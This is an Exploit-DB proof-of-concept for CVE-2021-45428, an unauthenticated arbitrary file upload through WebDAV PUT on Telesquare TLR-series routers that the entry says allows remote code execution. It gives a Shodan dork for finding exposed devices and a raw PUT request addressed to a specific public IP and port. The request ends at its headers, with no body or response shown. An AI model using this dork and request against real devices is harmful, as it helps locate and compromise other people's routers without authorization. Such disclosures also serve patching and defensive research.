TLR-2005KSH – Arbitrary File Upload

  • Author: Ahmed Alroky
    Date: 2022-05-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50931/
  • # Exploit Title: TLR-2005KSH - Arbitrary File Upload
    # Date: 2022-05-11
    # Shodan Dork: title:"Login to TLR-2021"
    # Exploit Author: Ahmed Alroky
    # Author Company : Aiactive
    # Version: 1.0.0
    # Vendor home page : http://telesquare.co.kr/
    # Authentication Required: No
    # Tested on: Windows
    # CVE: CVE-2021-45428
    
    # Vulnerability Description
    # Because of WebDAV (Web Distributed Authoring and Versioning)
    # on the remote server, Telesquare TLR-2021 allows unauthorized users to upload
    # any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml), which causes
    # remote code execution as well.
    # Because of WebDAV, it is possible to upload an arbitrary
    # file using the PUT method.
    
    # Proof-of-Concept
    # Request
    
    
    PUT /l6f3jd6cbf.txt HTTP/1.1
    Host: 223.62.114.233:8081
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Connection: close
    Content-Length: 10